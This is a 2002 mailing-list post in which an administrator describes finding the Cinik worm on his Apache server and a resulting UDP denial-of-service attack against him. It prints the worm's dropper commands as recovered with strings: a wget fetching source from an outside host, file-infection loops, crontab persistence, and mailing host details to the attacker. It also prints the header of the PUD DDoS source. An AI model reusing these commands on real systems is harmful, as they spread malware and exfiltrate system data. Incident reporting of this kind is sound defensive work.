[ale] Under attack! (html encoding alert)

Tue Sep 24 01:26:27 EDT 2002

Sorry for the html, having a bit of a problem right now.

I stumbled across a cracker getting into my box.Â  May have come in through apache as the username on the installed app is apache.Â  (httpd error log looks like openssl attack. openssl was NOT upgraded <doh!>)

In ps, I saw :

21236 ?Â Â Â Â Â Â Â  SÂ Â Â Â  96:33 /tmp/.cinik 63.238.109.140

Which is NOT something of mine. I was investigating a possible intrusion on another machine and did a ping on an IP address that someone had telneted in from on this clients machine. It was a live address with no DNS records and it suddenly went dark. A few minutes later, I noticed the connection lights on my DSL staying active for much longer than getting email. Saw the above process running on the webserver.

Ran "strings" on the found worm file. Some interesting stuff from that:

/usr/bin/wget http://zamfy.home.ro/0/cinik.c

mv /tmp/cinik.c /tmp/.cinik.c

echo -e 'chmod a+x $i

echo 1 `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo '# ale altora'>> /tmp/.cinik.go

echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 2>/dev/null`'>> /tmp/.cinik.go

echo 'do'>> /tmp/.cinik.go

echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go

echo ' chmod a+x $i'>> /tmp/.cinik.go

echo ' echo 2 `/bin/date +%H` \* \* \* $i %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo 'done'>> /tmp/.cinik.go

echo ' '>> /tmp/.cinik.go

echo '# directoarele mele'>> /tmp/.cinik.go

echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid $myid`'>> /tmp/.cinik.go

echo ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go

echo ' chmod a+x $i/.cinik'>> /tmp/.cinik.go

echo ' echo 3 `/bin/date +%H` \* \* \* $i/.cinik %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo HDD >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /bin/df -h >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo IP >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.cinik.go

echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>> /tmp/.cinik.go

echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go

chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit

This was from running strings on the lastlog in /var/log:

# strings lastlog 

171.118.33.65.cfl.rr.com

1-020.adsl.cyberlink.ch

But the real clincher is I caught the bastard in the act and got the source code intact!

>From the file /tmp/.cinic.c

/****************************************************************************

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â  Peer-to-peer UDP Distributed Denial of Service (PUD)Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  by contem at efnetÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â  Virtually connects computers via the udp protocol on theÂ Â Â Â Â Â Â Â  *

 *Â  specified port.Â  Uses a newly created peer-to-peer protocol thatÂ Â Â Â Â Â Â  *

 *Â  incorperates uses on unstable or dead computers.Â  The program isÂ Â Â Â Â Â Â  *

 *Â  ran with the parameters of another ip on the virtual network.Â  IfÂ Â Â Â Â Â  *

 *Â  running on the first computer, run with the ip 127.0.0.1 or someÂ Â Â Â Â Â Â  *

 *Â  other type of local address.Â  Ex:Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â  Computer A:Â Â  ./program 127.0.0.1Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â  Computer B:Â Â  ./program Computer_AÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â  Computer C:Â Â  ./program Computer_AÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â  Computer D:Â Â  ./program Computer_CÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â  Any form of that will work.Â  The linking process works byÂ Â Â Â Â Â Â  *

 *Â  giving each computer the list of avaliable computers, thenÂ Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â  using a technique called broadcast segmentation combined with TCPÂ Â Â Â Â Â  *

 *Â  like functionality to insure that another computer on the networkÂ Â Â Â Â Â  *

 *Â  receives the broadcast packet, segments it again and recreatesÂ Â Â Â Â Â Â Â Â  *

 *Â  the packet to send to other hosts.Â  That technique can be used toÂ Â Â Â Â Â  *

 *Â  support over 16 million simutaniously connected computers.Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â  Thanks to ensane and st for donating shells and test bedsÂ Â Â Â Â Â Â  *

 *Â  for this program.Â  And for the admins who removed me because IÂ Â Â Â Â Â Â Â Â  *

 *Â  was testing this program (you know who you are) need to watchÂ Â Â Â Â Â Â Â Â Â  *

 *Â  their backs.Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â  I am not responsible for any harm caused by this program!Â Â Â Â Â Â Â  *

 *Â  I made this program to demonstrate peer-to-peer communication andÂ Â Â Â Â Â  *

 *Â  should not be used in real life.Â  It is an education program thatÂ Â Â Â Â Â  *

 *Â  should never even be ran at all, nor used in any way, shape orÂ Â Â Â Â Â Â Â Â  *

 *Â  form.Â  It is not the authors fault if it was used for any purposesÂ Â Â Â Â  *

 *Â  other than educational.Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â  A FEW MODIFICATIONS MADE BY CiNIK FOR BETTER HIDING ON THE VICTIMÂ Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 *Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  *

 ****************************************************************************/

So now I'm getting pounded by udp packets in a DOS from at least 18 IP's.

This is going to the FBI.

-- 
James P. Kinney III   \Changing the mobile computing world/
President and CEO      \          one Linux user         /
Local Net Solutions,LLC \           at a time.          /
770-493-8244             \.___________________________./

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics) <jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7 

 This is a digitally signed message part